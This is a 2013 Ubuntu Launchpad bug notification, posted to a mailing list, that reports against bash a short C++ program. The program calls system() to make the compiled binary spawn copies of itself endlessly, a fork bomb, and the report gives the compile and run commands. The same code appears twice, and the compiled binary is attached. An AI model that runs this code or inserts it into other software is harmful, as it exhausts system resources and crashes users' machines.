[Bug 1101691] [NEW] Security alert: Concealment of shell fork bomb inside compiled code

Kenny Strawn 1101691 at bugs.launchpad.net
Sat Jan 19 07:20:19 UTC 2013 

*** This bug is a security vulnerability ***

Public security bug reported:

$ gedit bomb.cpp
> #include <iostream>
> #include <cstdio>
> #include <cstdlib>
>
> using namespace std;
> 
> int main() {
>   system("./bomb|./bomb&");
>   return 0;
> }

$ g++ bomb.cpp -o bomb
$ ./bomb

As can be seen, it's VERY easy to use the "system" function as a means
of hiding a shell fork bomb inside an object file -- a chilling tale
indeed.

ProblemType: Bug
DistroRelease: Ubuntu 12.10
Package: bash 4.2-5ubuntu1
Uname: Linux 3.4.0 x86_64
ApportVersion: 2.6.1-0ubuntu9
Architecture: amd64
Date: Fri Jan 18 23:11:58 2013
InstallationDate: Installed on 2012-04-26 (267 days ago)
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
MarkForUpload: True
ProcEnviron:
 TERM=xterm
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: bash
UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)

** Affects: bash (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: amd64 apport-bug quantal running-unity

** Attachment added: "Object file that the source code in post compiles to"
   https://bugs.launchpad.net/bugs/1101691/+attachment/3488436/+files/bomb

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1101691

Title:
  Security alert: Concealment of shell fork bomb inside compiled code

Status in “bash” package in Ubuntu:
  New

Bug description:
  $ gedit bomb.cpp
  > #include <iostream>
  > #include <cstdio>
  > #include <cstdlib>
  >
  > using namespace std;
  > 
  > int main() {
  >   system("./bomb|./bomb&");
  >   return 0;
  > }

  $ g++ bomb.cpp -o bomb
  $ ./bomb

  As can be seen, it's VERY easy to use the "system" function as a means
  of hiding a shell fork bomb inside an object file -- a chilling tale
  indeed.

  ProblemType: Bug
  DistroRelease: Ubuntu 12.10
  Package: bash 4.2-5ubuntu1
  Uname: Linux 3.4.0 x86_64
  ApportVersion: 2.6.1-0ubuntu9
  Architecture: amd64
  Date: Fri Jan 18 23:11:58 2013
  InstallationDate: Installed on 2012-04-26 (267 days ago)
  InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
  MarkForUpload: True
  ProcEnviron:
   TERM=xterm
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=<set>
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: bash
  UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1101691/+subscriptions

More information about the foundations-bugs mailing list